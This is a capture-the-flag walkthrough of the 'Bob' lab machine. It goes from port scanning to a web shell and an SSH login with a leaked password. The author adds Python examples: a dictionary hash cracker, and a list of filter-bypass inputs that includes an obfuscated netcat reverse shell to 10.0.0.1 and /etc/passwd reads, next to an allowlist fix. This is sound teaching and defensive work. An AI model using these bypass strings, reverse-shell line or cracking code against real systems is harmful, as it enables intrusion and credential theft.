Bob CTF

RECONNAISSANCE

I ran netdiscover to find hosts on the local network; the target's IP address was 192.168.0.151.

Next I port-scanned it with Nmap and found that port 80 (HTTP) was open.

NOTE: An alternative is nmap -sV -A -p- 192.168.0.151. The -p- flag scans all 65535 TCP ports instead of Nmap's default top 1000, which matters on this box because SSH turns out to be listening on the non-standard port 25468 and a default scan would miss it; -sV fingerprints service versions and -A adds OS detection and default scripts (noisy, but fine in a lab).

I pasted the IP into the browser's address bar and landed on the site. The next step was to walk the navigation bar (Home, News, About Us, Contact Us and Login) to see what I could find.

The news page explained why the website was under reconstruction: their servers had been hacked, so the team had to take security measures.

Under Contact Us I found the email addresses and phone numbers of internal employees. Publishing these is one of the worst practices, but it is an advantage to us: the email addresses can be tried as login names, and better still we now know that the administrator's username is admin and that the admin is Bob.

Next I started inspecting the page source to see what I could find. In /login.html I found a comment that Bob left for the other IT guys.

After that I checked new.html and found a Base64-encoded string, which I decoded.

The decoded text was a message from Bob complaining that someone had created a file called password.html.

The next thing was to check what password.html contained, but before that I opened Burp Suite to intercept and examine the traffic. At first Burp's site map showed only the normal navigation bar.

Next I spidered the site and found some interesting hidden paths, one of them a shell and another a password folder.

Opening password.html showed another message that Bob left the team about why they were hacked in the first place:

“Really, who made this file? At least get a hash of your password to display; hackers can’t do anything with a hash. This is probably why we had a security breach in the first place. Come on people, this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess every time someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob”

Bob's worst advice here is to leave a password hash on the page because he believes hackers can't do anything with hashes. They can: an unsalted hash of a weak password is cracked offline in seconds with a wordlist, and a salt only stops precomputed tables, not a dictionary attack against passwords as weak as the ones on this box.
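To show what an attacker actually does with a leaked hash, here is an added example that is not part of the original walkthrough: a small dictionary attack with the usual case and suffix mangling. The hash algorithm (unsalted MD5/SHA-1), the tiny wordlist and the salt handling are assumptions of mine; the page never says what password.html displayed beyond Bob's suggestion to show a hash.

```python
import hashlib
from typing import Iterable, Iterator, Optional

# Added example, not from the original post. Demonstrates why "hackers can't do
# anything with a hash" is wrong: an unsalted hash of a weak password falls to a
# dictionary attack in milliseconds.
# Assumptions (none from the page): the leaked value is a plain MD5/SHA-1 hex
# digest, and WORDLIST is a constructed stand-in for a real list such as rockyou.txt.

WORDLIST = ["password", "letmein", "qwerty", "admin", "welcome", "bob"]


def hash_hex(password: str, algo: str = "md5") -> str:
    """Hex digest of an unsalted hash, the kind a careless admin might paste on a page."""
    return hashlib.new(algo, password.encode()).hexdigest()


def salted_hash_hex(salt: str, password: str, algo: str = "sha1") -> str:
    """Hex digest of salt||password; the salt is stored next to the hash, so it is known."""
    return hashlib.new(algo, (salt + password).encode()).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """Yield the word plus the case and suffix variants users commonly apply."""
    seen = set()
    for base in (word, word.lower(), word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "!", "2018"):
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(hexdigest: str, algo: str = "md5",
          wordlist: Iterable[str] = WORDLIST) -> Optional[str]:
    """Return the wordlist-derived password whose unsalted hash equals hexdigest, else None."""
    target = hexdigest.lower()
    for word in wordlist:
        for cand in mangle(word):
            if hash_hex(cand, algo) == target:
                return cand
    return None


def crack_salted(salt: str, hexdigest: str, algo: str = "sha1",
                 wordlist: Iterable[str] = WORDLIST) -> Optional[str]:
    """Same attack with a known salt: the salt defeats rainbow tables, not guessing."""
    target = hexdigest.lower()
    for word in wordlist:
        for cand in mangle(word):
            if salted_hash_hex(salt, cand, algo) == target:
                return cand
    return None


if __name__ == "__main__":
    leaked = hash_hex("Qwerty")            # James's password from later in the writeup
    print(leaked, "->", crack(leaked))     # recovered from a six-word list
```

The only real defence is a slow, salted password hash (bcrypt, scrypt or Argon2) behind a strong password; with MD5 or SHA-1 a modern GPU tries billions of candidates per second, so the short list above is just the first few lines of what an attacker would run.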

Next I checked the other hidden page, lat_memo.html, where Bob left another message for the IT guys about the shell:

“Memo sent at GMT+10:00 2:37:42 by User: Bob
Hey guys, IT here. Don’t forget to check your emails regarding the recent security breach. There is a web shell running on the server with no protection, but it should be safe as I have ported over the filter from the old Windows server to our new Linux one. Your email will have the link to the shell.

-Bob”

Next I browsed to the shell subfolder, which opened a command-execution page.

The next step was to examine the source of the dev_shell.php page, where I found another note that Bob had left for the other employees.

Back in dev_shell.php I typed dir in the command box and a directory listing came back. In it was a backup of the shell's source, dev_shell.php.bak, which I downloaded from the web server.

Opening the downloaded script showed the commands the shell refuses to execute: pwd, netcat, ssh, wget, ping, traceroute, cat and nc. That is a blocklist, and a blocklist is only as complete as its author's imagination: any command not on the list, or a listed command spelled so the filter does not recognise it, goes straight through to the operating system.
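The following is an added example, not Bob's dev_shell.php: the page gives only the words the shell refuses, not how it matches them, so the blocklist below is my assumption of a plain substring check. Beside it is the allowlist design I would ship instead, which names the programs that may run and executes them without a shell. The bypass strings and the allowed-program set are constructed for the example.

```python
import re
import subprocess
from typing import List, Optional

# Added example, not the shell from the page. BLOCKED is the list the writeup
# recovered from dev_shell.php.bak; the substring matching is an assumption.
BLOCKED = ["pwd", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"]


def blocklist_allows(cmd: str, blocked=BLOCKED) -> bool:
    """Bob-style filter: refuse the command if any blocked word appears in it."""
    return not any(word in cmd for word in blocked)


# Constructed inputs that reach a blocked tool while containing none of the words.
# (The walkthrough's own trick, "more" instead of "cat", passes for the same reason.)
BYPASSES = [
    'c""at /etc/passwd',                # shell quoting splits the word
    "ca\\t /etc/passwd",                # backslash escape, same effect
    "$(printf 'c\\x61t') /etc/passwd",  # the word only exists at run time
    "n\\c -e /bin/sh 10.0.0.1 4444",    # same trick for a reverse shell
]

# Hardened alternative: allowlist of programs, plain arguments, no shell.
ALLOWED = {"ls", "dir", "more", "id", "uname"}   # constructed allowlist
ARG_RE = re.compile(r"[A-Za-z0-9_./-]+")          # no quotes, $, ;, |, & or spaces


def allowlist_parse(cmd: str, allowed=ALLOWED) -> Optional[List[str]]:
    """Accept exactly one allowed program plus simple arguments; return argv or None.
    Anything that could only be meaningful to a shell is rejected outright."""
    parts = cmd.strip().split()
    if not parts or parts[0] not in allowed:
        return None
    if any(not ARG_RE.fullmatch(arg) for arg in parts[1:]):
        return None
    return parts


def run_allowed(cmd: str) -> Optional[str]:
    """Run an allowlisted command as an argv list (shell=False), so no word list
    is needed: there is no shell for quoting or $(...) tricks to reach."""
    argv = allowlist_parse(cmd)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    for b in BYPASSES:
        print(f"{b!r:40} blocklist allows={blocklist_allows(b)} allowlist argv={allowlist_parse(b)}")
    print(run_allowed("id"))
```

The allowlist still runs with whatever privileges the web server has, so it controls which programs run, not what they may read; that part is file permissions and a dedicated low-privilege user, which is the other half of the fix Bob skipped.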

Knowing which commands were filtered, I went back to the shell and typed more /home to see whether there was a home directory, and there was.

Listing it with dir /home showed the user names.

I then listed Elliot's home directory with dir /home/elliot and found a file called theadminisdumb.txt.

Reading it with more /home/elliot/theadminisdumb.txt (more is not on the blocklist; cat is) gave the following:

“:::::::::::::: /home/elliot/theadminisdumb.txt :::::::::::::: The admin is dumb. In fact everyone in the IT dept is pretty bad, but I can’t blame all of them; the newbies Sebastian and James are quite new to managing a server, so I can forgive them for that password file they made on the server. But the admin, now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James. Now they do some dumb stuff but they’re new and this is just a high-school server, who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that don’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much, but he just yells at me and says I don’t know what I’m doing. Sebastian has noticed and I gave him some tips on better securing his account; I can’t say the same for his friend James, who doesn’t care and made his password: Qwerty. To be honest, James isn’t the worst, Bob is: his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. It’s only a matter of time before it’s broken into, so because of this I have changed my password to the admin is dumb. I hope Bob is fired after the future second breach because of his incompetence. I almost want to fix it myself, but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired, it’s a good time.”

Elliot mentioned James's password, which was a plus for me.

Knowing that James's username is jc and his password is Qwerty, I connected to the server over SSH on port 25468 (the non-standard port from the full port scan) and logged in as jc.

Then I listed the directories and found the final flag, which read “hey n there flag.txt”.

Download Bob CTF
